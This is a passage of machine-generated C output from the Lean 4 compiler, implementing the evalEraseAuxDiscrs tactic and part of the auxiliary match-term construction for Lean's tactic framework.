x_22, x_23, x_16); return x_24; } } } else { lean_object* x_25; lean_object* x_26; lean_object* x_27; uint8_t x_28; x_25 = lean_ctor_get(x_1, 0); x_26 = lean_usize_to_nat(x_2); x_27 = lean_array_get_size(x_25); x_28 = lean_nat_dec_lt(x_26, x_27); if (x_28 == 0) { lean_dec(x_27); lean_dec(x_26); return x_4; } else { uint8_t x_29; x_29 = lean_nat_dec_le(x_27, x_27); if (x_29 == 0) { lean_dec(x_27); lean_dec(x_26); return x_4; } else { size_t x_30; size_t x_31; 
lean_object* x_32; x_30 = lean_usize_of_nat(x_26); lean_dec(x_26); x_31 = lean_usize_of_nat(x_27); lean_dec(x_27); x_32 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_25, x_30, x_31, x_4); return x_32; } } } } } lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; uint8_t x_5; x_4 = lean_unsigned_to_nat(0u); x_5 = lean_nat_dec_eq(x_3, x_4); if (x_5 == 0) { lean_object* x_6; uint8_t x_7; x_6 = lean_ctor_get(x_1, 3); x_7 = lean_nat_dec_le(x_6, x_3); if (x_7 == 0) { lean_object* x_8; size_t x_9; size_t x_10; lean_object* x_11; lean_object* x_12; lean_object* x_13; uint8_t x_14; x_8 = lean_ctor_get(x_1, 0); x_9 = lean_usize_of_nat(x_3); x_10 = lean_ctor_get_usize(x_1, 4); x_11 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(x_8, x_9, x_10, x_2); x_12 = lean_ctor_get(x_1, 1); x_13 = lean_array_get_size(x_12); x_14 = lean_nat_dec_lt(x_4, x_13); if (x_14 == 0) { lean_dec(x_13); return x_11; } else { uint8_t x_15; x_15 = lean_nat_dec_le(x_13, x_13); if (x_15 == 0) { lean_dec(x_13); return x_11; } else { size_t x_16; size_t x_17; lean_object* x_18; x_16 = 0; x_17 = lean_usize_of_nat(x_13); lean_dec(x_13); x_18 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_12, x_16, x_17, x_11); return x_18; } } } else { lean_object* x_19; lean_object* x_20; lean_object* x_21; uint8_t x_22; x_19 = lean_ctor_get(x_1, 1); x_20 = lean_nat_sub(x_3, x_6); x_21 = lean_array_get_size(x_19); x_22 = lean_nat_dec_lt(x_20, x_21); if (x_22 == 0) { lean_dec(x_21); lean_dec(x_20); return x_2; } else { uint8_t x_23; x_23 = lean_nat_dec_le(x_21, x_21); if (x_23 == 0) { lean_dec(x_21); lean_dec(x_20); return x_2; } else { size_t x_24; size_t x_25; lean_object* x_26; x_24 = lean_usize_of_nat(x_20); lean_dec(x_20); x_25 = 
lean_usize_of_nat(x_21); lean_dec(x_21); x_26 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_19, x_24, x_25, x_2); return x_26; } } } } else { lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; uint8_t x_31; x_27 = lean_ctor_get(x_1, 0); x_28 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(x_27, x_2); x_29 = lean_ctor_get(x_1, 1); x_30 = lean_array_get_size(x_29); x_31 = lean_nat_dec_lt(x_4, x_30); if (x_31 == 0) { lean_dec(x_30); return x_28; } else { uint8_t x_32; x_32 = lean_nat_dec_le(x_30, x_30); if (x_32 == 0) { lean_dec(x_30); return x_28; } else { size_t x_33; size_t x_34; lean_object* x_35; x_33 = 0; x_34 = lean_usize_of_nat(x_30); lean_dec(x_30); x_35 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_29, x_33, x_34, x_28); return x_35; } } } } } lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; lean_object* x_5; x_4 = lean_ctor_get(x_1, 1); x_5 = l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(x_4, x_2, x_3); return x_5; } } lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { if (lean_obj_tag(x_1) == 0) { lean_object* x_12; lean_dec(x_10); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); x_12 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_12, 0, x_2); lean_ctor_set(x_12, 1, x_11); return x_12; } else { lean_object* x_13; lean_object* x_14; lean_object* x_15; x_13 = lean_ctor_get(x_1, 0); lean_inc(x_13); x_14 = lean_ctor_get(x_1, 1); lean_inc(x_14); lean_dec(x_1); lean_inc(x_10); lean_inc(x_9); lean_inc(x_8); 
lean_inc(x_7); x_15 = l_Lean_Meta_tryClear(x_2, x_13, x_7, x_8, x_9, x_10, x_11); if (lean_obj_tag(x_15) == 0) { lean_object* x_16; lean_object* x_17; x_16 = lean_ctor_get(x_15, 0); lean_inc(x_16); x_17 = lean_ctor_get(x_15, 1); lean_inc(x_17); lean_dec(x_15); x_1 = x_14; x_2 = x_16; x_11 = x_17; goto _start; } else { uint8_t x_19; lean_dec(x_14); lean_dec(x_10); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); x_19 = !lean_is_exclusive(x_15); if (x_19 == 0) { return x_15; } else { lean_object* x_20; lean_object* x_21; lean_object* x_22; x_20 = lean_ctor_get(x_15, 0); x_21 = lean_ctor_get(x_15, 1); lean_inc(x_21); lean_inc(x_20); lean_dec(x_15); x_22 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_22, 0, x_20); lean_ctor_set(x_22, 1, x_21); return x_22; } } } } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; lean_object* x_12; lean_object* x_13; lean_object* x_14; x_11 = lean_box(0); x_12 = lean_unsigned_to_nat(0u); x_13 = l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(x_1, x_11, x_12); x_14 = l_Lean_Elab_Tactic_getMainGoal(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); if (lean_obj_tag(x_14) == 0) { lean_object* x_15; lean_object* x_16; lean_object* x_17; x_15 = lean_ctor_get(x_14, 0); lean_inc(x_15); x_16 = lean_ctor_get(x_14, 1); lean_inc(x_16); lean_dec(x_14); lean_inc(x_9); lean_inc(x_8); lean_inc(x_7); lean_inc(x_6); x_17 = l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(x_13, x_15, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_16); if (lean_obj_tag(x_17) == 0) { lean_object* x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; x_18 = lean_ctor_get(x_17, 0); lean_inc(x_18); x_19 = lean_ctor_get(x_17, 1); lean_inc(x_19); lean_dec(x_17); x_20 = lean_alloc_ctor(1, 2, 0); 
lean_ctor_set(x_20, 0, x_18); lean_ctor_set(x_20, 1, x_11); x_21 = l_Lean_Elab_Tactic_replaceMainGoal(x_20, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_19); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); return x_21; } else { uint8_t x_22; lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); x_22 = !lean_is_exclusive(x_17); if (x_22 == 0) { return x_17; } else { lean_object* x_23; lean_object* x_24; lean_object* x_25; x_23 = lean_ctor_get(x_17, 0); x_24 = lean_ctor_get(x_17, 1); lean_inc(x_24); lean_inc(x_23); lean_dec(x_17); x_25 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_25, 0, x_23); lean_ctor_set(x_25, 1, x_24); return x_25; } } } else { uint8_t x_26; lean_dec(x_13); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); x_26 = !lean_is_exclusive(x_14); if (x_26 == 0) { return x_14; } else { lean_object* x_27; lean_object* x_28; lean_object* x_29; x_27 = lean_ctor_get(x_14, 0); x_28 = lean_ctor_get(x_14, 1); lean_inc(x_28); lean_inc(x_27); lean_dec(x_14); x_29 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_29, 0, x_27); lean_ctor_set(x_29, 1, x_28); return x_29; } } } } static lean_object* _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1() { _start: { lean_object* x_1; x_1 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1___boxed), 10, 0); return x_1; } } static lean_object* _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; x_1 = l___private_Lean_Elab_Tactic_Basic_0__Lean_Elab_Tactic_sortFVarIds___closed__1; x_2 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1; x_3 = lean_alloc_closure((void*)(l_ReaderT_bind___at_Lean_Elab_Tactic_liftMetaMAtMain___spec__1___rarg), 11, 2); lean_closure_set(x_3, 0, x_1); lean_closure_set(x_3, 1, x_2); return x_3; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, 
lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9) { _start: { lean_object* x_10; lean_object* x_11; x_10 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2; x_11 = l_Lean_Elab_Tactic_withMainContext___rarg(x_10, x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9); return x_11; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object* x_1) { _start: { lean_object* x_2; x_2 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg), 9, 0); return x_2; } } lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { _start: { size_t x_5; size_t x_6; lean_object* x_7; x_5 = lean_unbox_usize(x_2); lean_dec(x_2); x_6 = lean_unbox_usize(x_3); lean_dec(x_3); x_7 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(x_1, x_5, x_6, x_4); lean_dec(x_1); return x_7; } } lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { _start: { size_t x_5; size_t x_6; lean_object* x_7; x_5 = lean_unbox_usize(x_2); lean_dec(x_2); x_6 = lean_unbox_usize(x_3); lean_dec(x_3); x_7 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_1, x_5, x_6, x_4); lean_dec(x_1); return x_7; } } lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4___boxed(lean_object* x_1, lean_object* x_2) { _start: { lean_object* x_3; x_3 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(x_1, x_2); lean_dec(x_1); return x_3; } } lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { 
_start: { size_t x_5; size_t x_6; lean_object* x_7; x_5 = lean_unbox_usize(x_2); lean_dec(x_2); x_6 = lean_unbox_usize(x_3); lean_dec(x_3); x_7 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(x_1, x_5, x_6, x_4); lean_dec(x_1); return x_7; } } lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; x_4 = l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(x_1, x_2, x_3); lean_dec(x_3); lean_dec(x_1); return x_4; } } lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; x_4 = l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(x_1, x_2, x_3); lean_dec(x_3); lean_dec(x_1); return x_4; } } lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { lean_object* x_12; x_12 = l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10, x_11); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); return x_12; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; x_11 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_1); 
return x_11; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___boxed(lean_object* x_1) { _start: { lean_object* x_2; x_2 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs(x_1); lean_dec(x_1); return x_2; } } static lean_object* _init_l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1() { _start: { lean_object* x_1; x_1 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___boxed), 1, 0); return x_1; } } lean_object* l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object* x_1) { _start: { lean_object* x_2; lean_object* x_3; lean_object* x_4; lean_object* x_5; x_2 = l_Lean_Elab_Tactic_tacticElabAttribute; x_3 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; x_4 = l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1; x_5 = l_Lean_KeyedDeclsAttribute_addBuiltin___rarg(x_2, x_3, x_4, x_1); return x_5; } } static lean_object* _init_l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default() { _start: { lean_object* x_1; x_1 = lean_unsigned_to_nat(1u); return x_1; } } static lean_object* _init_l_Lean_Elab_Tactic_AuxMatchTermState_cases___default() { _start: { lean_object* x_1; x_1 = l_Array_empty___closed__1; return x_1; } } lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; lean_object* x_5; lean_object* x_6; lean_object* x_7; x_4 = lean_ctor_get(x_2, 5); x_5 = l_Lean_SourceInfo_fromRef(x_4); x_6 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_6, 0, x_5); lean_ctor_set(x_6, 1, x_1); x_7 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_7, 0, x_6); lean_ctor_set(x_7, 1, x_3); return x_7; } } static lean_object* _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1() { _start: { lean_object* x_1; x_1 = lean_mk_string("rhs"); return x_1; } } static lean_object* 
_init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2() { _start: { lean_object* x_1; lean_object* x_2; x_1 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; x_2 = lean_string_utf8_byte_size(x_1); return x_2; } } static lean_object* _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; lean_object* x_4; x_1 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; x_2 = lean_unsigned_to_nat(0u); x_3 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2; x_4 = lean_alloc_ctor(0, 3, 0); lean_ctor_set(x_4, 0, x_1); lean_ctor_set(x_4, 1, x_2); lean_ctor_set(x_4, 2, x_3); return x_4; } } static lean_object* _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; x_1 = lean_box(0); x_2 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; x_3 = lean_name_mk_string(x_1, x_2); return x_3; } } lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2(lean_object* x_1, lean_object* x_2, size_t x_3, size_t x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { uint8_t x_9; x_9 = x_4 < x_3; if (x_9 == 0) { lean_object* x_10; lean_object* x_11; lean_object* x_12; lean_dec(x_7); lean_dec(x_1); x_10 = x_5; x_11 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_11, 0, x_10); lean_ctor_set(x_11, 1, x_6); x_12 = 
lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_12, 0, x_11); lean_ctor_set(x_12, 1, x_8); return x_12; } else { lean_object* x_13; lean_object* x_14; lean_object* x_15; lean_object* x_16; lean_object* x_17; lean_object* x_26; lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; lean_object* x_31; uint8_t x_32; x_13 = lean_array_uget(x_5, x_4); x_14 = lean_unsigned_to_nat(0u); x_15 = lean_array_uset(x_5, x_4, x_14); x_26 = x_13; x_27 = l_myMacro____x40_Init_Notation___hyg_13954____closed__10; x_28 = l_Lean_Syntax_setKind(x_26, x_27); x_29 = lean_unsigned_to_nat(3u); x_30 = l_Lean_Syntax_getArg(x_28, x_29); x_31 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_18957____closed__5; lean_inc(x_30); x_32 = l_Lean_Syntax_isOfKind(x_30, x_31); if (x_32 == 0) { lean_object* x_33; uint8_t x_34; x_33 = l_myMacro____x40_Init_Notation___hyg_13954____closed__13; lean_inc(x_30); x_34 = l_Lean_Syntax_isOfKind(x_30, x_33); if (x_34 == 0) { lean_object* x_35; lean_object* x_36; lean_object* x_37; lean_object* x_38; lean_object* x_39; lean_object* x_40; lean_object* x_41; lean_object* x_42; lean_object* x_43; lean_object* x_44; lean_object* x_45; lean_object* x_46; lean_object* x_47; lean_object* x_48; lean_object* x_49; lean_object* x_50; lean_object* x_51; lean_object* x_52; lean_object* x_53; lean_object* x_54; lean_object* x_55; lean_object* x_56; lean_object* x_57; lean_object* x_58; lean_object* x_59; lean_object* x_60; lean_object* x_61; lean_object* x_62; uint8_t x_63; x_35 = lean_unsigned_to_nat(1u); x_36 = lean_nat_add(x_8, x_35); x_37 = lean_ctor_get(x_7, 0); lean_inc(x_37); x_38 = lean_ctor_get(x_7, 1); lean_inc(x_38); x_39 = lean_ctor_get(x_7, 3); lean_inc(x_39); x_40 = lean_ctor_get(x_7, 4); lean_inc(x_40); x_41 = lean_ctor_get(x_7, 5); lean_inc(x_41); lean_inc(x_8); lean_inc(x_38); x_42 = lean_alloc_ctor(0, 6, 0); lean_ctor_set(x_42, 0, x_37); lean_ctor_set(x_42, 1, x_38); lean_ctor_set(x_42, 2, x_8); lean_ctor_set(x_42, 3, x_39); 
lean_ctor_set(x_42, 4, x_40); lean_ctor_set(x_42, 5, x_41); x_43 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_6, x_42, x_36); x_44 = lean_ctor_get(x_43, 0); lean_inc(x_44); x_45 = lean_ctor_get(x_43, 1); lean_inc(x_45); lean_dec(x_43); x_46 = lean_ctor_get(x_44, 0); lean_inc(x_46); x_47 = lean_ctor_get(x_44, 1); lean_inc(x_47); lean_dec(x_44); x_48 = l_stx___x3f___closed__3; lean_inc(x_46); x_49 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_49, 0, x_46); lean_ctor_set(x_49, 1, x_48); x_50 = l_Array_empty___closed__1; x_51 = lean_array_push(x_50, x_49); x_52 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4; x_53 = l_Lean_addMacroScope(x_38, x_52, x_8); x_54 = lean_box(0); x_55 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3; x_56 = lean_alloc_ctor(3, 4, 0); lean_ctor_set(x_56, 0, x_46); lean_ctor_set(x_56, 1, x_55); lean_ctor_set(x_56, 2, x_53); lean_ctor_set(x_56, 3, x_54); x_57 = lean_array_push(x_51, x_56); x_58 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_58, 0, x_31); lean_ctor_set(x_58, 1, x_57); x_59 = l_Lean_Syntax_getArg(x_58, x_35); x_60 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_47, x_42, x_45); lean_dec(x_42); x_61 = lean_ctor_get(x_60, 0); lean_inc(x_61); x_62 = lean_ctor_get(x_60, 1); lean_inc(x_62); lean_dec(x_60); x_63 = !lean_is_exclusive(x_61); if (x_63 == 0) { lean_object* x_64; lean_object* x_65; lean_object* x_66; lean_object* x_67; lean_object* x_68; lean_object* x_69; lean_object* x_70; lean_object* x_71; lean_object* x_72; lean_object* x_73; lean_object* x_74; lean_object* x_75; lean_object* x_76; lean_object* x_77; lean_object* x_78; lean_object* x_79; lean_object* x_80; lean_object* x_81; lean_object* x_82; 
lean_object* x_83; lean_object* x_84; lean_object* x_85; lean_object* x_86; lean_object* x_87; lean_object* x_88; lean_object* x_89; lean_object* x_90; lean_object* x_91; lean_object* x_92; lean_object* x_93; lean_object* x_94; lean_object* x_95; lean_object* x_96; lean_object* x_97; lean_object* x_98; lean_object* x_99; lean_object* x_100; lean_object* x_101; lean_object* x_102; lean_object* x_103; lean_object* x_104; lean_object* x_105; lean_object* x_106; lean_object* x_107; lean_object* x_108; lean_object* x_109; lean_object* x_110; lean_object* x_111; lean_object* x_112; lean_object* x_113; lean_object* x_114; uint8_t x_115; x_64 = lean_ctor_get(x_61, 0); x_65 = lean_ctor_get(x_61, 1); x_66 = l_Lean_Parser_Tactic_case___closed__1; lean_inc(x_64); x_67 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_67, 0, x_64); lean_ctor_set(x_67, 1, x_66); x_68 = lean_array_push(x_50, x_67); x_69 = lean_array_push(x_68, x_59); x_70 = lean_unsigned_to_nat(2u); x_71 = l_Lean_Syntax_getArg(x_28, x_70); x_72 = l_Lean_Syntax_getHeadInfo(x_71); lean_dec(x_71); x_73 = l_myMacro____x40_Init_Notation___hyg_13352____closed__13; x_74 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_74, 0, x_72); lean_ctor_set(x_74, 1, x_73); x_75 = lean_array_push(x_69, x_74); x_76 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__5; lean_inc(x_64); x_77 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_77, 0, x_64); lean_ctor_set(x_77, 1, x_76); x_78 = lean_array_push(x_50, x_77); x_79 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; x_80 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_80, 0, x_79); lean_ctor_set(x_80, 1, x_78); x_81 = lean_array_push(x_50, x_80); x_82 = l_myMacro____x40_Init_Notation___hyg_15419____closed__12; lean_inc(x_64); x_83 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_83, 0, x_64); lean_ctor_set(x_83, 1, x_82); x_84 = lean_array_push(x_50, x_83); x_85 = l_Lean_nullKind___closed__2; x_86 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_86, 0, x_85); lean_ctor_set(x_86, 1, 
x_84); x_87 = lean_array_push(x_81, x_86); x_88 = l_Lean_groupKind___closed__2; x_89 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_89, 0, x_88); lean_ctor_set(x_89, 1, x_87); x_90 = lean_array_push(x_50, x_89); x_91 = l_prec_x28___x29___closed__3; lean_inc(x_64); x_92 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_92, 0, x_64); lean_ctor_set(x_92, 1, x_91); x_93 = lean_array_push(x_50, x_92); x_94 = lean_array_push(x_93, x_30); x_95 = l_prec_x28___x29___closed__7; x_96 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_96, 0, x_64); lean_ctor_set(x_96, 1, x_95); x_97 = lean_array_push(x_94, x_96); x_98 = l_Lean_Parser_Tactic_paren___closed__1; x_99 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_99, 0, x_98); lean_ctor_set(x_99, 1, x_97); x_100 = lean_array_push(x_50, x_99); x_101 = l_myMacro____x40_Init_Notation___hyg_1481____closed__8; x_102 = lean_array_push(x_100, x_101); x_103 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_103, 0, x_88); lean_ctor_set(x_103, 1, x_102); x_104 = lean_array_push(x_90, x_103); x_105 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_105, 0, x_85); lean_ctor_set(x_105, 1, x_104); x_106 = lean_array_push(x_50, x_105); x_107 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__5; x_108 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_108, 0, x_107); lean_ctor_set(x_108, 1, x_106); x_109 = lean_array_push(x_50, x_108); x_110 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__3; x_111 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_111, 0, x_110); lean_ctor_set(x_111, 1, x_109); x_112 = lean_array_push(x_75, x_111); x_113 = l_Lean_Parser_Tactic_case___closed__2; x_114 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_114, 0, x_113); lean_ctor_set(x_114, 1, x_112); x_115 = !lean_is_exclusive(x_65); if (x_115 == 0) { lean_object* x_116; lean_object* x_117; lean_object* x_118; x_116 = lean_ctor_get(x_65, 1); x_117 = lean_array_push(x_116, x_114); lean_ctor_set(x_65, 1, x_117); x_118 = l_Lean_Syntax_setArg(x_28, x_29, x_58); 
lean_ctor_set(x_61, 0, x_118); x_16 = x_61; x_17 = x_62; goto block_25; } else { lean_object* x_119; lean_object* x_120; lean_object* x_121; lean_object* x_122; lean_object* x_123; x_119 = lean_ctor_get(x_65, 0); x_120 = lean_ctor_get(x_65, 1); lean_inc(x_120); lean_inc(x_119); lean_dec(x_65); x_121 = lean_array_push(x_120, x_114); x_122 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_122, 0, x_119); lean_ctor_set(x_122, 1, x_121); x_123 = l_Lean_Syntax_setArg(x_28, x_29, x_58); lean_ctor_set(x_61, 1, x_122); lean_ctor_set(x_61, 0, x_123); x_16 = x_61; x_17 = x_62; goto block_25; } } else { lean_object* x_124; lean_object* x_125; lean_object* x_126; lean_object* x_127; lean_object* x_128; lean_object* x_129; lean_object* x_130; lean_object* x_131; lean_object* x_132; lean_object* x_133; lean_object* x_134; lean_object* x_135; lean_object* x_136; lean_object* x_137; lean_object* x_138; lean_object* x_139; 